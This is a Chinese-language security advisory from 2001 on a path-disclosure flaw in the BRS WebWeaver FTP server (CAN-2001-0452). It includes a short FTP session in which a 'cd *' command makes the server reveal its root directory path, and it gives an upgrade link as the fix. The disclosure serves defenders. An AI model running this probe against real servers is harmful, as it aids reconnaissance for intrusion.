BRS WebWeaver FTP 根目录物理路径泄露
发布日期:2001-05-05
更新日期:2001-05-05
受影响系统:
BRS WebWeaver 0.62beta
BRS WebWeaver 0.61beta
BRS WebWeaver 0.60beta
BRS WebWeaver 0.52beta
BRS WebWeaver 0.51beta
BRS WebWeaver 0.50beta
BRS WebWeaver 0.49beta
不受影响系统:
BRS WebWeaver 0.63beta
描述:
BUGTRAQ ID: 2676
CVE(CAN) ID:
CAN-2001-0452
BRS WebWeaver 是 Blaine Southam 开发的WEB和FTP服务软件。其中的FTP组件存在
缺陷,远程用户利用该缺陷可以得知FTP服务根目录的物理路径。在FTP命令状态下提
交"cd *"命令,服务器返回的错误信息中包含了FTP服务根目录的物理路径。
<* 来源:joe testa (
joetesta@hushmail.com) *>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
>ftp localhost
Connected to xxxxxxxxxxxx.rh.rit.edu.
220 BRS WebWeaver FTP Server ready.
User (xxxxxxxxxxxx.rh.rit.edu:(none)): jdog
331 Password required for jdog.
Password:
230 User jdog logged in.
ftp> cd *
250 CWD command successful. "/*/" is current directory.
ftp> ls
200 Port command successful.
150 Opening data connection for directory list.
c:\windows\desktop\*\*.* not found
226 File sent ok
ftp: 36 bytes received in 0.06Seconds 0.60Kbytes/sec.
ftp>
建议:
升级到0.63beta版:
http://members.nbci.com/_XMCM/BSoutham/download/WebWeaver063.exe
浏览次数:4008
严重程度:0(网友投票)